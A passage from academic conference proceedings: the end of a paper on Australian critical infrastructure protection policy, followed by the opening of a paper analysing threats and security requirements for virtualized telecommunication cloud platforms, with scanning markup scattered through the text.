In 2008, the Prime M<strong>in</strong>ister announced that he planned to cancel the long term plans of the ALP to create<br />
the new department on the basis that the <strong>in</strong>tegration of all the defence agencies would be too<br />
“cumbersome” (Frankl<strong>in</strong> and Walters, 2008).<br />
Seven years of plann<strong>in</strong>g and proposals had disappeared less than a year after an election due to the<br />
complexities of how adm<strong>in</strong>istration would be dealt with and confusion over how the complex <strong>in</strong>tegration<br />
could be achieved (Nicholson, 2008).<br />
The fact that the <strong>in</strong>itial plans arose swiftly after the terrorist attacks <strong>in</strong> September 2001 may pose<br />
questions as to whether the plans were ill thought out and borne out of the need to react rather than a<br />
sensible, productive and workable policy.<br />
4. Recent Australian Government strategy<br />
The Australian Federal Government (2008) has identified new security challenges, `it is <strong>in</strong>creas<strong>in</strong>gly<br />
evident that the sophistication of our modern community is a source of vulnerability <strong>in</strong> itself. For example,<br />
we are highly dependent on computer and <strong>in</strong>formation technology to drive critical <strong>in</strong>dustries such as<br />
aviation; electricity and water supply; bank<strong>in</strong>g and f<strong>in</strong>ance; and telecommunications networks. This<br />
dependency on <strong>in</strong>formation technology makes us potentially vulnerable to cyber attacks that may disrupt<br />
the <strong>in</strong>formation that <strong>in</strong>creas<strong>in</strong>gly lubricates our economy and system of government` (Rudd, 2008). This<br />
public acknowledgement by the Australian Prime M<strong>in</strong>ister, Kev<strong>in</strong> Rudd, identifies the new security<br />
challenges fac<strong>in</strong>g critical <strong>in</strong>frastructure protection and highlighted the follow<strong>in</strong>g security concerns (Rudd,<br />
2008):<br />
Ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g Australia’s territorial and border <strong>in</strong>tegrity;<br />
Promot<strong>in</strong>g Australia’s political sovereignty;<br />
Preserv<strong>in</strong>g a cohesive and resilient society and strong economy;<br />
Protect<strong>in</strong>g Australians and Australian <strong>in</strong>terests both at home and abroad, and<br />
Promot<strong>in</strong>g a stable, peaceful and prosperous <strong>in</strong>ternational environment; particularly <strong>in</strong> the Asia-<br />
Pacific region, together with a global rules-based order which enhances Australia’s national <strong>in</strong>terests.<br />
In 2009 the Federal Australian Government has responded to the issues regard<strong>in</strong>g cyber security and<br />
critical <strong>in</strong>frastructure by propos<strong>in</strong>g a coherent and government led approach to critical <strong>in</strong>frastructure<br />
protection. The primary objectives identified focus on all areas of Australian society where there are<br />
security risks, e.g. that <strong>in</strong>dividuals should be aware and take steps to “protect their identities, privacy and<br />
f<strong>in</strong>ances onl<strong>in</strong>e” (Australian Government, 2009) that bus<strong>in</strong>esses and the government operate “secure and<br />
resilient <strong>in</strong>formation and communication technologies” and trusted electronic operat<strong>in</strong>g environment that<br />
supports Australia’s national security and maximises the benefits of the digital economy (Australian<br />
Government, 2009). The Australian Federal Government also has developed a wide range of new<br />
strategic directions to focus Australia’s cyber security programs (Australian Government, 2009):<br />
Improve the detection, analysis, mitigation and response to sophisticated cyber threats, with a focus<br />
on government, critical <strong>in</strong>frastructure and other systems of national <strong>in</strong>terest;<br />
Educate and empower all Australians with the <strong>in</strong>formation, confidence and practical tools to protect<br />
themselves onl<strong>in</strong>e;<br />
Partner with bus<strong>in</strong>ess to promote security and resilience <strong>in</strong> <strong>in</strong>frastructures, networks, products and<br />
services;<br />
278
Matthew Warren and Shona Leitch<br />
Model best practice <strong>in</strong> the protection of government ICT systems, <strong>in</strong>clud<strong>in</strong>g the systems of those<br />
transact<strong>in</strong>g with government onl<strong>in</strong>e;<br />
Promote a secure, resilient and trusted global electronic operat<strong>in</strong>g environment that supports<br />
Australia’s national <strong>in</strong>terest;<br />
Ma<strong>in</strong>ta<strong>in</strong> an effective legal framework and enforcement capabilities to target and prosecute cyber<br />
crime;<br />
Promote the development of a skilled cyber security workforce with access to research and<br />
development to develop <strong>in</strong>novative solutions.<br />
As part of the new Australian Federal Government strategy, a new of number bodies have been<br />
developed with new capabilities. These <strong>in</strong>clude (Australian Government, 2009):<br />
CERT (Computer Emergency Response Team) Australia;<br />
This new Government body has moved to a national level to enable a “more <strong>in</strong>tegrated, holistic<br />
approach to cyber security across the Australian community”;<br />
Some of the previously formed cyber security activities that were undertaken by numerous different<br />
agencies such as the Australian Government’s Computer Emergency Read<strong>in</strong>ess Team (GovCERT)<br />
have been comb<strong>in</strong>ed together to form CERT <strong>in</strong> order to promote a greater (shared) understand<strong>in</strong>g;<br />
provide targeted advice and give Australians a s<strong>in</strong>gle po<strong>in</strong>t of contact.<br />
Cyber <strong>Security</strong> Operations Centre (CSOC).<br />
The core functions of the CSOC are focused ma<strong>in</strong>ly on government, <strong>in</strong>frastructure and critical private<br />
sector systems and aims to be a source for all issues related to awareness (especially the detection<br />
of sophisticated threats) and a facility to respond to cyber security risks and problems which are of<br />
national importance.<br />
Another key aspect of CSOC is that it provides Australian Defences with a cyber warfare capability and<br />
provides a resource designed to service all government agencies (DSD, 2011).<br />
The Australian Federal Government has started to refocus away from Critical Infrastructure Protection to<br />
Critical Infrastructure Resilience. The Australian Attorney General Robert McClelland announced that<br />
“The time has come for the protection m<strong>in</strong>dset to be broadened – to embrace the broader concept of<br />
resilience”. The aim is to build a more resilient nation – one where all Australians are better able to adapt<br />
to change, where we have reduced exposure to risks, and where we are all better able to bounce back<br />
from disaster” (TISN, 2010).<br />
The Australian Federal Government <strong>in</strong> 2010 launched the new Critical Infrastructure Resilience Strategy.<br />
The aim of this new strategy is the cont<strong>in</strong>ued operation of critical <strong>in</strong>frastructure <strong>in</strong> the face of all hazards<br />
as this critical <strong>in</strong>frastructure supports Australia’s national defence and national security and underp<strong>in</strong>s our<br />
economic prosperity and social wellbe<strong>in</strong>g. More resilient critical <strong>in</strong>frastructure will also help to achieve the<br />
cont<strong>in</strong>ued provision of essential services to the community (Australian Government, 2010). This new<br />
strategy also deals with new areas such as disaster protection and disaster resilience and this shift <strong>in</strong><br />
policy is go<strong>in</strong>g to have a major impact upon Australia.<br />
5. Discussion<br />
The major issue fac<strong>in</strong>g Australia is the currently adopted distributed model of critical <strong>in</strong>frastructure<br />
protection and decision mak<strong>in</strong>g and how that can effectively manage and secure Australia’s critical<br />
<strong>in</strong>frastructure. Whilst it is commendable that an Australian Federal Government has faced the issue of<br />
critical <strong>in</strong>frastructure and cyber threats, the fact that this approach attempts to cover the entirety of<br />
Australia may <strong>in</strong> itself be problematic. There has been some streaml<strong>in</strong><strong>in</strong>g of operations by nationalis<strong>in</strong>g<br />
CERT, however there are still a number of separate agencies that are <strong>in</strong>volved <strong>in</strong> this process; Attorney-<br />
General’s Department (AGD), the Australian Communications and Media Authority (ACMA), the<br />
Australian Federal Police (AFP), the Australian <strong>Security</strong> Intelligence Organisation’s (ASIO), the Defence<br />
Signals Directorate (DSD), the Department of Broadband, Communication and the Digital Economy<br />
(DBCDE), the Australian Government Information Management Office (AGIMO), the Jo<strong>in</strong>t Operat<strong>in</strong>g<br />
Arrangements (JOA) and the Cyber <strong>Security</strong> Policy and Coord<strong>in</strong>ation (CSPC) Committee. It is clear that<br />
there has been an overall Government shift to form two “umbrella” agencies (CERT and CSOC) to<br />
monitor, promote and control cyber threats however complexity will still arise as there as so many sub<br />
agencies that are <strong>in</strong>volved <strong>in</strong> this process. In an area such as cyber security where speed is often of<br />
upmost importance to limit damage, the <strong>in</strong>teraction of a large number of other agencies will surely slow<br />
279
Matthew Warren and Shona Leitch<br />
this process down. If an Cyber attack occurs <strong>in</strong> real time aga<strong>in</strong>st Australia, would they be able to react<br />
and make decisions <strong>in</strong> real time, or would the distributed model actually impact the decision mak<strong>in</strong>g<br />
process? Another unique issue that relates to Australia is the federated government system consist<strong>in</strong>g of<br />
a federal government and a number of state governments. A key issue is that when an attack occurs<br />
aga<strong>in</strong>st an <strong>in</strong>frastructure at a state level that the response time to escalate the decision mak<strong>in</strong>g process<br />
to the Federal government may be slow. This time lag could cause serious consequences and limit the<br />
effectiveness of these agencies.<br />
A new factor with the <strong>in</strong>troduction of CSOC is the move away from civilian organisations protect<strong>in</strong>g<br />
Australia’s critical <strong>in</strong>frastructure and cyber security risks and mak<strong>in</strong>g defence organisations responsible<br />
for this role. This may heighten the chance of attacks aga<strong>in</strong>st Australia’s critical <strong>in</strong>frastructure because it<br />
could be considered a military target. The major shift <strong>in</strong> Australian policy is the announcement <strong>in</strong> 2010 of<br />
the move away from Critical Infrastructure Protection to Critical Infrastructure Resilience and the <strong>in</strong>clusion<br />
of natural disaster <strong>in</strong>to the policy. This will have a major impact upon Australia and the real implications<br />
are still yet to emerge especially with the recent natural disasters <strong>in</strong> Australia.<br />
6. Conclusion<br />
Australia over the last decade has taken major steps <strong>in</strong> the protection of its national critical <strong>in</strong>frastructure.<br />
The Australian model is a workable model that has helped to protect Australian critical <strong>in</strong>frastructure<br />
aga<strong>in</strong>st physical and cyber risks. The issue is whether the distributed model will work <strong>in</strong> a real time<br />
situation and whether the time delays would impacts the decision mak<strong>in</strong>g processes.<br />
A new emerg<strong>in</strong>g issue is the focus upon Critical Infrastructure Resilience and the future impact that this<br />
may have.<br />
References<br />
Australian Labor Party (ALP) (2001). Labor's Better Plan For Defence - A Secure Future, Canberra.<br />
Australian Labor Party (ALP) (2003). ALP News Statement – Development of Homeland <strong>Security</strong> Portfolio, Canberra.<br />
Attorney-General’s Department (AGDs) (1998). Report of the Interdepartmental Committee on Protection of the<br />
National Information Infrastructure, Available from: http:// law.gov.au/publications/niireport/niirpt.pdf, visited 10 th<br />
March, 2007.<br />
Attorney General Department (AGD) (2004). Critical Infrastructure Protection National Strategy, Available from:<br />
http://www.nationalsecurity.gov.au, Accessed 10 th November, 2007.<br />
Australian Government (2004). Protect<strong>in</strong>g Australia Aga<strong>in</strong>st Terrorism, Department of the Prime M<strong>in</strong>ister and<br />
Cab<strong>in</strong>et, Barton, ACT.<br />
Australian Government (2009). Cyber <strong>Security</strong> Strategy, Attorney Generals Department, Commonwealth of Australia,<br />
ISBN 978-1-921241-99-4.<br />
Australian Government (2010). Critical Infrastructure Resilience Strategy, Attorney Generals Department,<br />
Commonwealth of Australia, ISBN: 978-1-921725-25-8.<br />
Australian Institute of Crim<strong>in</strong>ology (2009). Australian Bus<strong>in</strong>ess Assessment of Computer User <strong>Security</strong>, ISBN 978 1<br />
921532 35 1.<br />
Beazley, K. (2005). A Nation Unprepared: Australia <strong>in</strong> the Fourth Year of a Long War, Address to the Sydney<br />
Institute, Sydney, 4 th August.<br />
Busuttil, T. and Warren, M. (2004). A risk analysis approach to critical <strong>in</strong>formation <strong>in</strong>frastructure protection,<br />
Proceed<strong>in</strong>gs of the 5th Australian Information Warfare and <strong>Security</strong> Conference, Perth, Western Australia.<br />
Defence Signals Directorate (DSD) (2011). CSOC - Cyber <strong>Security</strong> Operations Centre, Available from:<br />
http://www.dsd.gov.au/<strong>in</strong>fosec/csoc.htm, Accessed 10 th January, 2011.<br />
Frankl<strong>in</strong>, M and Walters, F (2008). Homeland <strong>Security</strong> Division Faces Axe, The Australian, May 8 th .<br />
Lewis, T (2006). Critical Infrastructure Protection <strong>in</strong> Homeland <strong>Security</strong>, Wiley Publishers, USA, ISBN 978-0-471-<br />
78628-3.<br />
Nicholson, B. (2008). PM abandons “cumbersome” homeland security department. The Australian, December 4th.<br />
Smith, S. (2004). Infrastructure, [Onl<strong>in</strong>e], NSW Parliament, Available from<br />
http://www.parliament.nsw.gov.au/prod/parlment/publications.nsf/0/C6389C30B0383F9ACA256ECF0006F610,<br />
Accessed 10 th November, 2009.<br />
TISN (Trusted Information Shar<strong>in</strong>g Network) (2007). About Critical Infrastructure, Available from:<br />
http://www.tisn.gov.au, Accessed, 15 th July, 2009.<br />
TISN (Trusted Information Shar<strong>in</strong>g Network) (2010). The Shift To Resilience, CIR News, Vol 7 &, No 1.<br />
Rudd, K. (2008). The First National <strong>Security</strong> Statement to the Parliament Address by the Prime M<strong>in</strong>ister of Australia,<br />
The Hon. Kev<strong>in</strong> Rudd MP, URL: http://www.pm.gov.au/media/speech/2008/speech_0659.cfm, Accessed, 10 th<br />
December, 2008.<br />
Warren, M. and Leitch. S. (2010). Commercial Critical Systems and Critical Infrastructure Protection: A Future<br />
Research Agenda, Proceed<strong>in</strong>gs of the 2010 European Information Warfare Conference, Thessaloniki, Greece.<br />
280
PhD<br />
Papers<br />
281
282
<strong>Security</strong> Considerations for Virtual Platform Provision<strong>in</strong>g<br />
Mudassar Aslam and Christian Gehrmann<br />
Swedish Institute of Computer Science (SICS), Sweden<br />
mudassar.aslam@sics.se<br />
chrisg@sics.se<br />
Abstract: The concept of virtualization is not new but leverag<strong>in</strong>g virtualization <strong>in</strong> different modes and at different<br />
layers has revolutionized its usage scenarios. Virtualization can be applied at application layer to create sandbox<br />
environment, operat<strong>in</strong>g system layer to virtualize shared system resources (e.g. memory, CPU), at platform level or<br />
<strong>in</strong> any other useful possible hybrid scheme. When virtualization is applied at platform level, the result<strong>in</strong>g virtualized<br />
platform can run multiple virtual mach<strong>in</strong>es as if they were physically separated real mach<strong>in</strong>es. Provision<strong>in</strong>g<br />
virtualized platforms <strong>in</strong> this way is often also referred to as Infrastructure-as-a-Service or Platform-as-a-Service when<br />
full host<strong>in</strong>g and application support is also offered. Different bus<strong>in</strong>ess models, like datacenters or<br />
telecommunication providers and operators, can get bus<strong>in</strong>ess benefits by us<strong>in</strong>g platform virtualization due to the<br />
possibility of <strong>in</strong>creased resource utilization and reduced upfront <strong>in</strong>frastructure setup expenditures. This opportunity<br />
comes together with new security issues. An organization that runs services <strong>in</strong> form of virtual mach<strong>in</strong>e images on an<br />
offered platform needs security guarantees. In short, it wants evidence that the platforms it utilizes are trustworthy<br />
and that sensitive <strong>in</strong>formation is protected. Even if this sounds natural and straight forward, few attempts have been<br />
made to analyze <strong>in</strong> details what these expectations means from a security technology perspective <strong>in</strong> a realistic<br />
deployment scenario. In this paper we present a telecommunication virtualized platform provision<strong>in</strong>g scenario with<br />
two major stakeholders, the operator who utilizes virtualized telecommunication platform resources and the service<br />
provider, who offers such resources to operators. We make threats analysis for this scenario and derive major<br />
security requirements from the different stakeholders’ perspectives. Through <strong>in</strong>vestigat<strong>in</strong>g a particular virtual mach<strong>in</strong>e<br />
provision<strong>in</strong>g use case, we take the first steps towards a better understand<strong>in</strong>g of the major security obstacles with<br />
respect to platform service offer<strong>in</strong>gs. The last couple of years we have seen <strong>in</strong>creased activities around security for<br />
clouds regard<strong>in</strong>g different usage and bus<strong>in</strong>ess models. We contribute to this important area through a thorough<br />
security analysis of a concrete deployment scenario. F<strong>in</strong>ally, we use the security requirements derived through the<br />
analysis to make a comparison with contemporary related research and to identify future research challenges <strong>in</strong> the<br />
area.<br />
Keywords: security; trust; virtualization; virtual private server; telecommunication networks, clouds<br />
1. Introduction<br />
Past years we have seen a strong move <strong>in</strong> the market place towards usage of virtualization technologies.<br />
The virtualization technology we discuss here is the approach when a complete software systme<br />
(<strong>in</strong>clud<strong>in</strong>g OS) runs on top of a hypervisor. This makes the illusion to the guest system of actuall runn<strong>in</strong>g<br />
directly upon the real hardware and it is offen referred to as system virutalization (Smith & Nair 2005).<br />
Virtualization allows one to run legacy applications unmodified on new hardware platforms. This is<br />
realized through on-the-fly translation from one hardware <strong>in</strong>struction set to another with the assistance of<br />
a so called hypervisor or Virtual Mach<strong>in</strong>e Monitor (VMM). A hypervisor runs <strong>in</strong> the most privileged mode<br />
<strong>in</strong> a system and has full control over vital system resources. A hypervisor-based system not only allows<br />
<strong>in</strong>struction translation, but above all, <strong>in</strong>creased system utilization as multiple Virtual Mach<strong>in</strong>es (VM) can<br />
run simultaneously on a s<strong>in</strong>gle powerful hardware platform, open<strong>in</strong>g for new bus<strong>in</strong>ess models and a new<br />
bus<strong>in</strong>ess landscape. This implies for example that exist<strong>in</strong>g services can rather easily be migrated <strong>in</strong>to<br />
large comput<strong>in</strong>g clusters or what often is referred to as the cloud. The term cloud <strong>in</strong> general refers to<br />
offer<strong>in</strong>g a service of any category rang<strong>in</strong>g from application to <strong>in</strong>frastructure. Generally know broader<br />
categories are Software-as-a-Service (SaaS), Platform-as-a-Service (PaaS) and Infrastructure-as-a-<br />
Service (IaaS) which are sometimes commonly called SPI service models (<strong>Security</strong> Guidance for Critical<br />
Areas of Focus <strong>in</strong> Cloud Comput<strong>in</strong>g 2009). There are many other possible cloud based services as well,<br />
like Application-as-a-Service, Database-as-a-Service, Storage-as-a-Service, etc. This paper particularly<br />
focuses on platform virtualization which provides a way to offer Virtual Private Server or IaaS <strong>in</strong> cloud<br />
term<strong>in</strong>ology.<br />
The new flexibility offered by virtualization and cloud based models have a price: <strong>in</strong>creased security risks.<br />
Systems previously physically isolated, might now run on the same mach<strong>in</strong>e and consequently open<strong>in</strong>g<br />
up to new attacks between virtual mach<strong>in</strong>es runn<strong>in</strong>g simultaneously on the same hardware. A recent<br />
survey shows that despite potential benefits, companies are reluctant to migrate their bus<strong>in</strong>esses from<br />
exist<strong>in</strong>g physical platforms to more flexible, scalable and cost effective virtual platforms “due to fear about<br />
security threats and loss of control of data and systems” (CircleID 2009). This shows the importance of<br />
283
Mudassar Aslam and Christian Gehrmann<br />
careful security requirements analysis consider<strong>in</strong>g stakeholders’ concerns and most importantly propose<br />
ways to establish stakeholders trust <strong>in</strong> a bus<strong>in</strong>ess model like cloud which provisions virtual resources.<br />
A telecommunication cloud presents such a use case <strong>in</strong> which the resource provider offers Infrastructureas-a-Service<br />
us<strong>in</strong>g platform virtualization. Despite the scope of a telecommunication cloud as a future<br />
service model, few attempts have been made to do detailed security requirements analysis consider<strong>in</strong>g<br />
new dynamics of the proposed systems and required trust build<strong>in</strong>g mechanisms between stakeholders to<br />
make an acceptable bus<strong>in</strong>ess model. This paper focuses on these basic but important issues. We<br />
present a virtualized platform provision<strong>in</strong>g model thereby deriv<strong>in</strong>g a telecommunication cloud use case.<br />
Furthermore we focus on security requirements by consider<strong>in</strong>g possible security threats <strong>in</strong> such a model.<br />
The aim of this paper is to identify security requirements which are important for establish<strong>in</strong>g<br />
stakeholders’ trust <strong>in</strong> offer<strong>in</strong>g Infrastructure-as-a-Service to telecommunication operators. The ma<strong>in</strong><br />
contributions of this paper are the follow<strong>in</strong>g:<br />
We present a telecommunication cloud use case where virtualized telecommunication nodes are<br />
offered to different operators.<br />
We identify, analyze and consolidate security requirements of the stakeholders which form the basis<br />
when creat<strong>in</strong>g a secure architecture for a telecommunication cloud.<br />
F<strong>in</strong>ally, we recommend a set of security mechanisms needed to create trust between stakeholders <strong>in</strong><br />
future telecommunication clouds.<br />
This paper is organized as follows. In Section 2 we describe the telecommunication cloud scenario. In<br />
Section 3 we present security threats and derive major security requirements. It also identifies<br />
recommended security mechanisms for a trusted telecommunication cloud. Section 4 presents related<br />
work and we conclude <strong>in</strong> Section 5.<br />
2. Scenario – a telecommunication cloud use case<br />
In the preced<strong>in</strong>g decade, focus of virtual resource provision<strong>in</strong>g had been on virtualiz<strong>in</strong>g data centers<br />
(Berger et al. 2008), (Griff<strong>in</strong> et al. 2005) but with the rapid expansion of telecommunication networks,<br />
user base and services offered by the operators, there are strong reasons for operators and their<br />
resource providers to adopt more flexible bus<strong>in</strong>ess models to be competitive and <strong>in</strong> order to meet the<br />
chang<strong>in</strong>g and <strong>in</strong>creas<strong>in</strong>g demands of end-customers. In this paper we consider a resource model that is<br />
a step <strong>in</strong> this direction, allow<strong>in</strong>g several operators to share a common telecommunication <strong>in</strong>frastructure.<br />
The model <strong>in</strong>cludes two major stakeholders - the Provider who provisions virtual telecommunication<br />
platforms <strong>in</strong>stead of physical resources, and the Operator who operates the telecommunication network<br />
utiliz<strong>in</strong>g the platforms offered by the provider hence offer<strong>in</strong>g services to its end-customers.<br />
In traditional telecommunication networks where the operator owns all physical resources, it needs to<br />
<strong>in</strong>vest <strong>in</strong> an <strong>in</strong>frastructure that is able to handle the most demand<strong>in</strong>g traffic peaks. As a consequence of<br />
this, the operator might need to spend on resources which rema<strong>in</strong> under utilized most of the time. From<br />
the operators’ perspective, they like to be able to pay for the exact type and number of resources they<br />
require to service their end customers’ rapidly chang<strong>in</strong>g demands. Similarly, the <strong>in</strong>frastructure provider<br />
must be able to rapidly provision required resources to the operators. By us<strong>in</strong>g the recent advancements<br />
<strong>in</strong> virtualization technologies and emerg<strong>in</strong>g cloud service models, the platform provider can <strong>in</strong>stead offer<br />
a Telecommunication Cloud that can be offered to multiple operators. Through scal<strong>in</strong>g effects and<br />
efficient management of this <strong>in</strong>frastructure, this can result <strong>in</strong> better resource utilization and an overall<br />
more cost efficient solution similar to most current cloud comput<strong>in</strong>g models. Furthermore, provider can<br />
enforce strong licens<strong>in</strong>g techniques restrict<strong>in</strong>g operators to use only provisioned resources. An overview<br />
diagram of the stated scenario is shown <strong>in</strong> Fig.1.<br />
We consider a model where the provider hosts and manages physical platforms and provides basic<br />
hypervisor layer for virtualization. This allows provider to offer complete virtual platforms as a service<br />
which can then be used by different operators to launch their virtual mach<strong>in</strong>es. Where provider is<br />
responsible to manage physical platforms and a basic virtualization layer, the operators are responsible<br />
to manage all software layers of their own virtual mach<strong>in</strong>es <strong>in</strong>clud<strong>in</strong>g operat<strong>in</strong>g system, antivirus and<br />
firewalls. This implies that the proposed Telecommunication Cloud offers Infrastructure-as-a-Service<br />
(IaaS) as opposed to offer<strong>in</strong>g Platform-as-a-Service (PaaS) where the consumer does not get complete<br />
freedom (L<strong>in</strong>thicum et al. 2009). The launch<strong>in</strong>g of virtual mach<strong>in</strong>e image and subsequently its<br />
management are done by the operator us<strong>in</strong>g Operator Management Clients (OMCs) through a gateway<br />
entity. The gateway entity protects the provider <strong>in</strong>ternal network from unauthorized external accesses.<br />
284
Mudassar Aslam and Christian Gehrmann<br />
Similarly, the provider manages the virtualized telecommunication platforms through a Provider<br />
Management Client (PMC). There are other possible network models, for example, a model with an<br />
<strong>in</strong>termediate entity which takes the responsibility of manag<strong>in</strong>g the telecommunication cloud. In such<br />
scenario, the provider outsources its virtual resources to the Cloud Management Entity (CME), which<br />
then provisions the available resources to the operators. The result<strong>in</strong>g <strong>in</strong>frastructure would allow a CME<br />
to offer virtual resources from different providers. This paper however focuses on two-role model<br />
<strong>in</strong>volv<strong>in</strong>g only a provider and operator.<br />
Figure 1: Our proposed telecommunication cloud scenario<br />
3. Threat and security requirements<br />
One of the most important hurdles for adopt<strong>in</strong>g a dynamic virtual telecommunication resource model is<br />
the security. The cloud provider and the operator both fear about new threats which arise due to<br />
simultaneously runn<strong>in</strong>g virtual mach<strong>in</strong>es of different operators on same physical platforms. A successfully<br />
executed attack on a specific platform can cause leak of confidential operator data which <strong>in</strong> turn might<br />
result <strong>in</strong> severe bus<strong>in</strong>ess loss or other damage. Moreover, an attacker could use provider resources<br />
illegally if he or she could take control over the target platform. We have analyzed the scenario and<br />
identified major threats that are summarized <strong>in</strong> Table 1. These threats have <strong>in</strong> turn been used to identify<br />
stakeholders’ security requirements, which we list <strong>in</strong> the subsequent sections together with some<br />
recommendations on security solutions meet<strong>in</strong>g the requirements.<br />
285
Table 1: Telecommunication cloud threats<br />
Mudassar Aslam and Christian Gehrmann<br />
Attacker Threat Target<br />
T1 O, A Malicious code <strong>in</strong>stallation VMM, VMMGT, VMOPR<br />
T2 P Un<strong>in</strong>tentional <strong>in</strong>stallation of hostile S/W VMM, VMMGT<br />
T3 A, O Impersonate provider Gateway, VMMGT<br />
T4 A, O Impersonate a legitimate operator Gateway, VMMGT<br />
T5 P Access run-time or configuration data VMOPR<br />
T6 A Denial of Service attack Provider Network<br />
T7 O Repudiate VM launch VMMGT<br />
T8 O Interfere other operators’ VM VMOPR<br />
T9 O Get confidential data from other operators’ VM VMOPR<br />
O: Legitimate Operator | P : Legitimate Provider | A : Outside attacker | VMMGT : Management VM<br />
3.1 Provider network authentication<br />
Authentication is the b<strong>in</strong>d<strong>in</strong>g of an identity to a pr<strong>in</strong>cipal. It is a standard security service which must be<br />
performed for any secure distributed system. Commonly used authentication mechanisms <strong>in</strong>clude<br />
passwords, challenge-response, certificates etc (Bishop 2004). With respect to connect<strong>in</strong>g Operator<br />
Management Clients (OMCs), there is a need for authentication on two different levels, mutual<br />
authentication towards the provider network at the gateway and authentication on management VM level.<br />
The latter also applies to connect<strong>in</strong>g Provider Management Clients (PMCs) to reduce threat T3. Mutual<br />
authentication between OMCs and the gateway are needed to mitigate threats T3, T4 and T6. A state-ofthe-art<br />
solution would be to use exist<strong>in</strong>g secure session establishment protocols wherever applicable, for<br />
example, us<strong>in</strong>g Internet Key Exchange protocol (IKE 2005) for mutual authentication and key exchange<br />
<strong>in</strong> comb<strong>in</strong>ation with IPsec (IPsec 2005) for establish<strong>in</strong>g virtual private network (VPN). Authentication by<br />
the management VM of connect<strong>in</strong>g OMCs and PMCs could typically be done as part of the management<br />
protocol that applies (REST, Web Service, SMTP etc.) and would for example be certificate based (see<br />
also Section 3.3 below).<br />
3.2 Platform <strong>in</strong>tegrity and authentication<br />
In order to mitigate threats T1 and T2, there is a need to have close control of the software that is<br />
executed on the virtual platforms. When the operator wants to launch its virtual mach<strong>in</strong>e on the provider<br />
provisioned virtual platform, he or she should check the configuration and <strong>in</strong>tegrity status of the target<br />
platform prior to launch<strong>in</strong>g the service. This implies that every piece of code, right from the beg<strong>in</strong>n<strong>in</strong>g of<br />
the boot process, is securely reported <strong>in</strong> some protected storage such that the status later can be verified<br />
by connect<strong>in</strong>g OMCs. Most relevant methods to consider <strong>in</strong>clude the Trusted Comput<strong>in</strong>g Group trusted<br />
boot and remote attestation pr<strong>in</strong>ciples (TCG 2003). With regard to platform authentication <strong>in</strong> a cloud<br />
scenario, the operator is actually not <strong>in</strong>terested <strong>in</strong> identity of the target platform rather its <strong>in</strong>tegrity which is<br />
reported <strong>in</strong> remote attestation. Thus a virtual platform is authenticated if its verified configurations are<br />
trusted accord<strong>in</strong>g to the policies that the operator applies.<br />
3.3 Authentication, attestation and VM launch protocol<br />
There are two important steps before the launch of a VM. First, the operator require network<br />
authentication (section 3.1) and then remote attestation (section 3.2). From operator’s perspective, it is<br />
important that the VM launch should performed <strong>in</strong> the same session as these two steps ensure that the<br />
operator VM is launched on a platform which is previously attested. Furthermore, due to platform and<br />
software licens<strong>in</strong>g, the provider would be <strong>in</strong>terested <strong>in</strong> protection aga<strong>in</strong>st replay of VM launch command<br />
and protection aga<strong>in</strong>st later repudiation by the operator (threat T7). In order to mitigate these threats, the<br />
designed protocol should cryptographically b<strong>in</strong>d the authentication, attestation and VM launch sessions.<br />
Therefore, there should be a comprehensively analyzed security protocol for authentication, attestation<br />
and VM launch. The chosen protocol shall provide replay protection, session b<strong>in</strong>d<strong>in</strong>g and non-repudiation<br />
of VM launch.<br />
286
3.4 VM isolation<br />
Mudassar Aslam and Christian Gehrmann<br />
VM isolation is an important security requirement for virtual resource provision<strong>in</strong>g scenarios. In the<br />
virtualized telecommunication cloud environment, the VMs of different operators run on the same<br />
physical mach<strong>in</strong>e thus open<strong>in</strong>g room for <strong>in</strong>terfer<strong>in</strong>g other operators’ VMs. In order to mitigate this threat<br />
(T8, T9) it is important to ensure that operator VMs must be isolated. This isolation is provided by the<br />
hypervisor layer (Chisnall 2007), (KVM 2007), (VMware 2010). Hence, the security of the whole system<br />
depends upon the correctness of hypervisor. Hypervisors are claimed to provide isolation which is as<br />
strong as physical isolation if not better. However, to ensure this proposition, the size of hypervisor itself<br />
and the code/libraries it is built upon must be kept as small as possible to m<strong>in</strong>imize hierarchical trust<br />
dependencies as recommended by (Doorn 2007). Furthermore, the hypervisor implementation must meet<br />
higher evaluation assurance level (EAL) to get common criteria certification (CC 2011). This is an<br />
important requirement <strong>in</strong> order to establish operators’ trust <strong>in</strong> the behavior of the provisioned platform.<br />
The operator would only be required to verify that the provider platform runs the certified hypervisor.<br />
3.5 Confidentiality<br />
Preferably, consider<strong>in</strong>g threat T5, the operator would like at VM launch to cryptographically b<strong>in</strong>d the VM<br />
<strong>in</strong>clud<strong>in</strong>g all its configurations like secure credentials to a trusted resource platform configuration. This<br />
can potentially be partly solved through usage of the seal<strong>in</strong>g techniques as def<strong>in</strong>ed by the Trusted<br />
Comput<strong>in</strong>g Group (TCG 2003) and specified <strong>in</strong> (TCG Specification Architecture Overview 2007). The<br />
actual data protection and isolation must be provided by the hypervisor though and seal<strong>in</strong>g techniques<br />
will only help as long as there is a hypervisor layer that the operator can trust with respect to protect<strong>in</strong>g<br />
and isolat<strong>in</strong>g VM security critical data (see Section 3.4).<br />
3.6 Secure VM migration<br />
VM migration is a process <strong>in</strong> which a runn<strong>in</strong>g operator VM is migrated from one physical platform to<br />
another. The VM migration moves the active memory and execution state of the VM along with VM<br />
security credentials (e.g. keys). The provider must be able to support undetectable migration of operators’<br />
VMs to allow un<strong>in</strong>terrupted access of the provisioned resources. VM migration is a resource<br />
adm<strong>in</strong>istration tool which deals with situations like optimization of workload with <strong>in</strong> provider resource<br />
pools, perform<strong>in</strong>g platform hardware ma<strong>in</strong>tenance without schedul<strong>in</strong>g downtimes and disrupt<strong>in</strong>g<br />
provisioned services. Where VM migration is a provider’s <strong>in</strong>dispensable adm<strong>in</strong>istrative requirement, the<br />
operator’s security concern is the threat T5. There must be a mechanism for secure migration of<br />
operator’s security credentials e.g. keys. VM migration is an active research topic which should also<br />
consider the protection of security credentials <strong>in</strong> transit. The TPM based migratable keys (TPM 2007)<br />
could be considered <strong>in</strong> design<strong>in</strong>g a secure VM migration solution.<br />
3.7 Summary<br />
Trust establishment between cloud stakeholders is one of the major challenges which can be met by<br />
fulfill<strong>in</strong>g a set of security requirements presented <strong>in</strong> the preced<strong>in</strong>g sections. <strong>Security</strong> mechanisms like<br />
secure boot, remote attestation, cryptographic bound<strong>in</strong>g of operator VM to the provider platform and<br />
secure hypervisor are the ma<strong>in</strong> drivers for trust establishment. 0 presents a summary of the threats<br />
